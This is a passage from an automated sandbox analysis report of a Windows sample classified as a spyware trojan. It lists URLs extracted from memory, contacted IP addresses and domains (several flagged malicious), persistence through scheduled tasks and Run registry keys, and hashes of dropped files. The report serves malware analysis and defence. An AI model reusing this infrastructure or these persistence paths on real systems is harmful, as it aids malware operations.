                                                                                                        http://tempuri.org/Entity/Id5ResponseFA5C.exe, 00000027.00000002.951781161.0000000002E61000.00000004.00000001.sdmpfalse
                                                                                                        • URL Reputation: safe
                                                                                                        		unknown
                                                                                                        http://schemas.xmlsoap.org/ws/2004/08/addressing/faultDFA5C.exe, 00000027.00000002.951781161.0000000002E61000.00000004.00000001.sdmpfalse
                                                                                                          		high
                                                                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dnsFA5C.exe, 00000027.00000002.951781161.0000000002E61000.00000004.00000001.sdmpfalse
                                                                                                            		high
                                                                                                            http://tempuri.org/Entity/Id10ResponseFA5C.exe, 00000027.00000002.951781161.0000000002E61000.00000004.00000001.sdmpfalse
                                                                                                            • URL Reputation: safe
                                                                                                            		unknown
                                                                                                            http://schemas.xmlsoap.org/ws/2005/02/trust/RenewFA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpfalse
                                                                                                              		high
                                                                                                              http://tempuri.org/Entity/Id8ResponseFA5C.exe, 00000027.00000002.951781161.0000000002E61000.00000004.00000001.sdmpfalse
                                                                                                              • URL Reputation: safe
                                                                                                              		unknown
                                                                                                              https://support.google.com/chrome/?p=plugin_wmpFA5C.exe, 00000027.00000002.978852970.000000000301D000.00000004.00000001.sdmp, FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpfalse
                                                                                                                		high
                                                                                                                http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionIDFA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpfalse
                                                                                                                  		high
                                                                                                                  http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCTFA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpfalse
                                                                                                                    		high
                                                                                                                    http://schemas.xmlsoap.org/ws/2006/02/addressingidentityFA5C.exe, 00000027.00000002.953499141.0000000002EF0000.00000004.00000001.sdmpfalse
                                                                                                                      		high
                                                                                                                      http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKeyFA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpfalse
                                                                                                                        		high
                                                                                                                        http://schemas.xmlsoap.org/ws/2004/10/wsat/RollbackFA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpfalse
                                                                                                                          		high
                                                                                                                          https://support.google.com/chrome/?p=plugin_javaFA5C.exe, 00000027.00000002.978852970.000000000301D000.00000004.00000001.sdmp, FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpfalse
                                                                                                                            		high
                                                                                                                            http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCTFA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpfalse
                                                                                                                              		high
                                                                                                                              http://schemas.xmlsoap.org/ws/2004/06/addressingexFA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpfalse
                                                                                                                                		high
                                                                                                                                http://schemas.xmlsoap.org/ws/2004/04/security/trust/NonceFA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponseFA5C.exe, 00000027.00000002.951781161.0000000002E61000.00000004.00000001.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      https://support.google.com/chrome/?p=plugin_divxFA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        http://tempuri.org/Entity/Id13ResponseFA5C.exe, 00000027.00000002.951781161.0000000002E61000.00000004.00000001.sdmpfalse
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        		unknown
                                                                                                                                        http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdFA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentifFA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            http://schemas.xmlsoap.org/ws/2004/10/wsat/CommittedFA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/right/possesspropertyFA5C.exe, 00000027.00000002.951781161.0000000002E61000.00000004.00000001.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    http://schemas.xmlsoap.org/ws/2004/04/security/sc/sctFA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpfalse
                                                                                                                                                      		high
                                                                                                                                                      http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgementFA5C.exe, 00000027.00000002.951781161.0000000002E61000.00000004.00000001.sdmpfalse
                                                                                                                                                        		high
                                                                                                                                                        http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCTFA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpfalse
                                                                                                                                                          		high
                                                                                                                                                          https://www.google.com/images/branding/product/ico/googleg_lodp.icoFA5C.exe, 00000027.00000002.1016026617.00000000030C9000.00000004.00000001.sdmp, FA5C.exe, 00000027.00000002.976385152.0000000003007000.00000004.00000001.sdmp, FA5C.exe, 00000027.00000002.1075583600.000000000321E000.00000004.00000001.sdmp, FA5C.exe, 00000027.00000002.978852970.000000000301D000.00000004.00000001.sdmp, FA5C.exe, 00000027.00000002.1021158613.00000000030DF000.00000004.00000001.sdmp, FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpfalse
                                                                                                                                                            		high
                                                                                                                                                            http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymousFA5C.exe, 00000027.00000002.951781161.0000000002E61000.00000004.00000001.sdmpfalse
                                                                                                                                                              		high
                                                                                                                                                              http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_WrapFA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpfalse
                                                                                                                                                                		high
                                                                                                                                                                http://schemas.xmlsoap.org/ws/2002/12/policyFA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpfalse
                                                                                                                                                                  		high
                                                                                                                                                                  http://tempuri.org/Entity/Id22ResponseFA5C.exe, 00000027.00000002.951781161.0000000002E61000.00000004.00000001.sdmpfalse
                                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                                  		unknown
                                                                                                                                                                  https://search.yahoo.com/favicon.icohttps://search.yahoo.com/searchFA5C.exe, 00000027.00000002.1016026617.00000000030C9000.00000004.00000001.sdmp, FA5C.exe, 00000027.00000002.976385152.0000000003007000.00000004.00000001.sdmp, FA5C.exe, 00000027.00000002.1075583600.000000000321E000.00000004.00000001.sdmp, FA5C.exe, 00000027.00000002.978852970.000000000301D000.00000004.00000001.sdmp, FA5C.exe, 00000027.00000002.1021158613.00000000030DF000.00000004.00000001.sdmp, FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpfalse
                                                                                                                                                                    		high
                                                                                                                                                                    https://www.tiktok.com/legal/report/feedbacksvchost.exe, 00000016.00000003.793370380.000001A784B89000.00000004.00000001.sdmp, svchost.exe, 00000016.00000003.793597944.000001A785002000.00000004.00000001.sdmp, svchost.exe, 00000016.00000003.793450984.000001A784BD2000.00000004.00000001.sdmpfalse
                                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                                    		unknown
                                                                                                                                                                    http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/IssueFA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpfalse
                                                                                                                                                                      		high
                                                                                                                                                                      http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextFA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpfalse
                                                                                                                                                                        		high
                                                                                                                                                                        http://schemas.xmlsoap.org/ws/2005/02/trust/IssueFA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpfalse
                                                                                                                                                                          		high
                                                                                                                                                                          https://get.adobFA5C.exe, 00000027.00000002.978852970.000000000301D000.00000004.00000001.sdmp, FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpfalse
                                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                                          		unknown
                                                                                                                                                                          http://schemas.xmlsoap.org/ws/2005/02/trust/spnegoFA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpfalse
                                                                                                                                                                            		high
                                                                                                                                                                            http://schemas.xmlsoap.org/ws/2005/02/scFA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpfalse
                                                                                                                                                                              		high
                                                                                                                                                                              http://tempuri.org/Entity/Id18ResponseFA5C.exe, 00000027.00000002.951781161.0000000002E61000.00000004.00000001.sdmpfalse
                                                                                                                                                                              • URL Reputation: safe
                                                                                                                                                                              		unknown
                                                                                                                                                                              http://service.real.com/realplayer/security/02062012_player/en/FA5C.exe, 00000027.00000002.978852970.000000000301D000.00000004.00000001.sdmp, FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpfalse
                                                                                                                                                                                		high
                                                                                                                                                                                http://docs.oasis-open.org/wss/oasis-wss-wssecurity-secext-1.1.xsdFA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpfalse
                                                                                                                                                                                  		high
                                                                                                                                                                                  https://disneyplus.com/legal.svchost.exe, 00000016.00000003.792006375.000001A784B93000.00000004.00000001.sdmpfalse
                                                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                                                  		unknown
                                                                                                                                                                                  http://tempuri.org/Entity/Id3ResponseFA5C.exe, 00000027.00000002.1030809011.0000000003112000.00000004.00000001.sdmp, FA5C.exe, 00000027.00000002.951781161.0000000002E61000.00000004.00000001.sdmpfalse
                                                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                                                  		unknown
                                                                                                                                                                                  http://schemas.xmlsoap.org/ws/2005/02/rmFA5C.exe, 00000027.00000002.951781161.0000000002E61000.00000004.00000001.sdmpfalse
                                                                                                                                                                                    		high
                                                                                                                                                                                    http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceFA5C.exe, 00000027.00000002.951781161.0000000002E61000.00000004.00000001.sdmpfalse
                                                                                                                                                                                      		high
                                                                                                                                                                                      http://schemas.xmlsoap.org/soap/actor/nextFA5C.exe, 00000027.00000002.951781161.0000000002E61000.00000004.00000001.sdmpfalse
                                                                                                                                                                                        		high
                                                                                                                                                                                        https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=FA5C.exe, 00000027.00000002.1016026617.00000000030C9000.00000004.00000001.sdmp, FA5C.exe, 00000027.00000002.976385152.0000000003007000.00000004.00000001.sdmp, FA5C.exe, 00000027.00000002.1075583600.000000000321E000.00000004.00000001.sdmp, FA5C.exe, 00000027.00000002.978852970.000000000301D000.00000004.00000001.sdmp, FA5C.exe, 00000027.00000002.1021158613.00000000030DF000.00000004.00000001.sdmp, FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpfalse
                                                                                                                                                                                          		high
                                                                                                                                                                                          http://service.rFA5C.exe, 00000027.00000002.978852970.000000000301D000.00000004.00000001.sdmp, FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpfalse
                                                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                                                          		unknown
                                                                                                                                                                                          http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinaryFA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpfalse
                                                                                                                                                                                            		high
                                                                                                                                                                                            http://tempuri.org/Entity/Id9FA5C.exe, 00000027.00000002.951781161.0000000002E61000.00000004.00000001.sdmpfalse
                                                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                                                            		unknown
                                                                                                                                                                                            http://tempuri.org/Entity/Id8FA5C.exe, 00000027.00000002.951781161.0000000002E61000.00000004.00000001.sdmpfalse
                                                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                                                            		unknown

                                                                                                                                                                                            Contacted IPs

                                                                                                                                                                                            • No. of IPs < 25%
                                                                                                                                                                                            • 25% < No. of IPs < 50%
                                                                                                                                                                                            • 50% < No. of IPs < 75%
                                                                                                                                                                                            • 75% < No. of IPs

                                                                                                                                                                                            Public

                                                                                                                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                            185.163.45.70
                                                                                                                                                                                            		unknownMoldova Republic of
                                                                                                                                                                                            		39798MIVOCLOUDMDfalse
                                                                                                                                                                                            94.142.143.116
                                                                                                                                                                                            		patmushta.infoRussian Federation
                                                                                                                                                                                            		35196IHOR-ASRUfalse
                                                                                                                                                                                            185.215.113.35
                                                                                                                                                                                            		unknownPortugal
                                                                                                                                                                                            		206894WHOLESALECONNECTIONSNLtrue
                                                                                                                                                                                            188.166.28.199
                                                                                                                                                                                            		unknownNetherlands
                                                                                                                                                                                            		14061DIGITALOCEAN-ASNUStrue
                                                                                                                                                                                            172.67.139.105
                                                                                                                                                                                            		goo.suUnited States
                                                                                                                                                                                            		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                            86.107.197.138
                                                                                                                                                                                            		unknownRomania
                                                                                                                                                                                            		39855MOD-EUNLfalse
                                                                                                                                                                                            8.209.70.0
                                                                                                                                                                                            		host-data-coin-11.comSingapore
                                                                                                                                                                                            		45102CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCfalse
                                                                                                                                                                                            54.38.220.85
                                                                                                                                                                                            		unicupload.topFrance
                                                                                                                                                                                            		16276OVHFRfalse
                                                                                                                                                                                            162.159.135.233
                                                                                                                                                                                            		cdn.discordapp.comUnited States
                                                                                                                                                                                            		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                            104.47.54.36
                                                                                                                                                                                            		microsoft-com.mail.protection.outlook.comUnited States
                                                                                                                                                                                            		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                            144.76.136.153
                                                                                                                                                                                            		transfer.shGermany
                                                                                                                                                                                            		24940HETZNER-ASDEfalse
                                                                                                                                                                                            81.163.30.181
                                                                                                                                                                                            		unknownRussian Federation
                                                                                                                                                                                            		58303IR-RASANAPISHTAZIRtrue
                                                                                                                                                                                            185.233.81.115
                                                                                                                                                                                            		unknownRussian Federation
                                                                                                                                                                                            		50113SUPERSERVERSDATACENTERRUtrue
                                                                                                                                                                                            185.7.214.171
                                                                                                                                                                                            		unknownFrance
                                                                                                                                                                                            		42652DELUNETDEtrue
                                                                                                                                                                                            185.186.142.166
                                                                                                                                                                                            		unknownRussian Federation
                                                                                                                                                                                            		204490ASKONTELRUtrue
                                                                                                                                                                                            185.163.204.22
                                                                                                                                                                                            		unknownGermany
                                                                                                                                                                                            		20771CAUCASUS-CABLE-SYSTEMCCSAutonomousSystemGEfalse
                                                                                                                                                                                            185.163.204.24
                                                                                                                                                                                            		unknownGermany
                                                                                                                                                                                            		20771CAUCASUS-CABLE-SYSTEMCCSAutonomousSystemGEtrue

                                                                                                                                                                                            Private

                                                                                                                                                                                            IP
                                                                                                                                                                                            192.168.2.1

                                                                                                                                                                                            General Information

                                                                                                                                                                                            Joe Sandbox Version:34.0.0 Boulder Opal
                                                                                                                                                                                            Analysis ID:553170
                                                                                                                                                                                            Start date:14.01.2022
                                                                                                                                                                                            Start time:12:27:37
                                                                                                                                                                                            Joe Sandbox Product:CloudBasic
                                                                                                                                                                                            Overall analysis duration:0h 16m 35s
                                                                                                                                                                                            Hypervisor based Inspection enabled:false
                                                                                                                                                                                            Report type:light
                                                                                                                                                                                            Sample file name:sbxGIUIhRd.exe
                                                                                                                                                                                            Cookbook file name:default.jbs
                                                                                                                                                                                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                                                            Number of analysed new started processes analysed:50
                                                                                                                                                                                            Number of new started drivers analysed:0
                                                                                                                                                                                            Number of existing processes analysed:0
                                                                                                                                                                                            Number of existing drivers analysed:0
                                                                                                                                                                                            Number of injected processes analysed:1
                                                                                                                                                                                            Technologies:
                                                                                                                                                                                            • HCA enabled
                                                                                                                                                                                            • EGA enabled
                                                                                                                                                                                            • HDC enabled
                                                                                                                                                                                            • AMSI enabled
                                                                                                                                                                                            Analysis Mode:default
                                                                                                                                                                                            Analysis stop reason:Timeout
                                                                                                                                                                                            Detection:MAL
                                                                                                                                                                                            Classification:mal100.troj.spyw.evad.winEXE@60/26@82/18
                                                                                                                                                                                            EGA Information:
                                                                                                                                                                                            • Successful, ratio: 100%
                                                                                                                                                                                            HDC Information:
                                                                                                                                                                                            • Successful, ratio: 25.7% (good quality ratio 18.6%)
                                                                                                                                                                                            • Quality average: 57.3%
                                                                                                                                                                                            • Quality standard deviation: 40.8%
                                                                                                                                                                                            HCA Information:
                                                                                                                                                                                            • Successful, ratio: 57%
                                                                                                                                                                                            • Number of executed functions: 0
                                                                                                                                                                                            • Number of non-executed functions: 0
                                                                                                                                                                                            Cookbook Comments:
                                                                                                                                                                                            • Adjust boot time
                                                                                                                                                                                            • Enable AMSI
                                                                                                                                                                                            • Found application associated with file extension: .exe
                                                                                                                                                                                            Warnings:
                                                                                                                                                                                            Show All
                                                                                                                                                                                            • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                                                                                                                                                                                            • TCP Packets have been reduced to 100
                                                                                                                                                                                            • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, wuapihost.exe
                                                                                                                                                                                            • Excluded IPs from analysis (whitelisted): 40.91.112.76, 20.54.110.249, 20.42.73.29, 104.215.148.63, 40.76.4.15, 40.112.72.205, 40.113.200.201, 13.77.161.179
                                                                                                                                                                                            • Excluded domains from analysis (whitelisted): displaycatalog-rp-uswest.md.mp.microsoft.com.akadns.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, s-ring.msedge.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, iplogger.org, wus2-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, arc.msn.com, t-ring.msedge.net, ris.api.iris.microsoft.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, consumer-displaycatalogrp-aks2aks-uswest.md.mp.microsoft.com.akadns.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, a0621298.xsph.ru, watson.telemetry.microsoft.com, microsoft.com, teams-ring.msedge.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                                                                                                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                            • Report creation exceeded maximum time and may have missing behavior and disassembly information.
                                                                                                                                                                                            • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                            • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                            • Report size exceeded maximum capacity and may have missing network information.
                                                                                                                                                                                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                                            • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                                                                                                                            Simulations

                                                                                                                                                                                            Behavior and APIs

                                                                                                                                                                                            TimeTypeDescription
                                                                                                                                                                                            12:29:12Task SchedulerRun new task: Firefox Default Browser Agent ADA74C3DB01BEC27 path: C:\Users\user\AppData\Roaming\adijaeg
                                                                                                                                                                                            12:29:26API Interceptor1x Sleep call for process: CFE8.exe modified
                                                                                                                                                                                            12:29:33API Interceptor8x Sleep call for process: svchost.exe modified
                                                                                                                                                                                            12:29:36API Interceptor1x Sleep call for process: WerFault.exe modified
                                                                                                                                                                                            12:30:12API Interceptor514x Sleep call for process: mjlooy.exe modified
                                                                                                                                                                                            12:30:12API Interceptor3x Sleep call for process: 7D38.exe modified
                                                                                                                                                                                            12:30:14Task SchedulerRun new task: mjlooy.exe path: C:\Users\user\AppData\Local\Temp\82aa4a6c48\mjlooy.exe
                                                                                                                                                                                            12:30:31AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Driver C:\Users\user\AppData\Roaming\Sysfiles\setup_m.exe
                                                                                                                                                                                            12:30:43AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Driver C:\Users\user\AppData\Roaming\Sysfiles\setup_m.exe

                                                                                                                                                                                            Joe Sandbox View / Context

                                                                                                                                                                                            IPs

                                                                                                                                                                                            No context

                                                                                                                                                                                            Domains

                                                                                                                                                                                            No context

                                                                                                                                                                                            ASN

                                                                                                                                                                                            No context

                                                                                                                                                                                            JA3 Fingerprints

                                                                                                                                                                                            No context

                                                                                                                                                                                            Dropped Files

                                                                                                                                                                                            No context

                                                                                                                                                                                            Created / dropped Files

                                                                                                                                                                                            C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_8A6B.exe_27f61c19393a91a6721bfcdfd39195a1563f_168ad717_1a666159\Report.wer
                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                            File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):65536
                                                                                                                                                                                            Entropy (8bit):0.814130699743922
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:96:/NFAsohLcQfYOQoJ7R3V6tpXIQcQec6tycEfcw32+HbHg/8BRTf3o8Fa9iVfOyW9:1Ro9cQn8HQ0lLjIq/u7ssS274ItLV
                                                                                                                                                                                            MD5:BCFAA4F0ABE224C129081104195B208D
                                                                                                                                                                                            SHA1:7C74E7C498C804E32708117FED56F786144135DB
                                                                                                                                                                                            SHA-256:571F668A0B47ABB3006EFA67DECA6BDEF2C7B1FEE84F1A834D4E96686EEF2719
                                                                                                                                                                                            SHA-512:66803D4E9AC9824321022784AF827F1A91E057B2F43D903278798D5C50147FE4B4FB3F61A106B8853A0F60517142F1130A8B31A45FD2AD314DEE230A8F494C68
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                            Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.2.8.6.6.3.3.3.6.5.5.7.1.0.5.2.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.8.6.6.3.3.3.7.4.9.1.4.8.1.8.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.d.5.3.8.4.4.d.-.6.e.2.3.-.4.8.6.4.-.b.c.9.9.-.8.6.8.6.e.4.7.9.c.c.6.9.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.f.9.d.5.9.b.3.-.7.a.3.d.-.4.7.a.0.-.8.9.8.a.-.4.a.1.4.a.b.4.9.1.5.b.b.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.8.A.6.B...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.a.6.8.-.0.0.0.1.-.0.0.1.b.-.3.0.7.d.-.6.a.f.6.3.9.0.9.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.7.d.3.e.8.5.d.f.1.f.9.7.0.7.5.8.a.1.f.b.6.1.3.8.8.5.7.3.8.d.c.a.0.0.0.0.2.9.0.1.!.0.0.0.0.5.9.9.5.a.e.9.d.0.2.4.7.0.3.6.c.c.6.d.3.e.a.7.4.1.e.7.5.0.4.c.9.1.3.f.1.f.b.7.6.!.8.A.6.B...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.1././.1.1././.1.2.:.
                                                                                                                                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER9E61.tmp.csv
                                                                                                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                            File Type:data
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):50272
                                                                                                                                                                                            Entropy (8bit):3.0513863283023377
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:1536:tTH80y1WUTcM/x/5pPrvVsEv1dGNOJOe72bAMS5p:tTH80y1WUTcM/x/5pPrvVsEv1dGNOJR3
                                                                                                                                                                                            MD5:2C514D97A71C40AE306F14DC5FE4939D
                                                                                                                                                                                            SHA1:D54DC9D0B97A9D80856B0B1A2B2B3958F6E93A07
                                                                                                                                                                                            SHA-256:5EB64B0168ACE1914E6D15E9A486DC733228B3FF67C0A91BD29A64B5F7559E57
                                                                                                                                                                                            SHA-512:AACBE3B2EF9E6119597E4FEC4DA7D690E6A66704D7E37B32F8E05D56537BAE0A6A0FA0D9C3775549F1BBEA82DD8843EC0C9E1FB4D3FD9E31D769EEC6C2F8A384
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                            Preview: I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.
                                                                                                                                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WERA5A6.tmp.txt
                                                                                                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                            File Type:data
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):13340
                                                                                                                                                                                            Entropy (8bit):2.6958459932531285
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:96:9GiZYWqmbloY/YSW48H5YYEZDNt6iCqZSnwOLDaOzegIYzDvIoD3:9jZDqYrjO3a8XIYzMoD3
                                                                                                                                                                                            MD5:A48C0C244A03917EB506BFC4589E49E6
                                                                                                                                                                                            SHA1:46D79E4DFCD5E10A83A8D5C0570C8593083697AE
                                                                                                                                                                                            SHA-256:D2AB6DF46DBA2B199382BAE371ED00789E343881376CCFE37614AE36A19E49CC
                                                                                                                                                                                            SHA-512:07743E4D06DC669DFAE13CBC81A15E6777751FD33157BFF2551CCE986D5EE22F953586EB0D773F4ED529CF15EE165B28F08530A2D018025C5013A6F7FE0E3D23
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:unknown
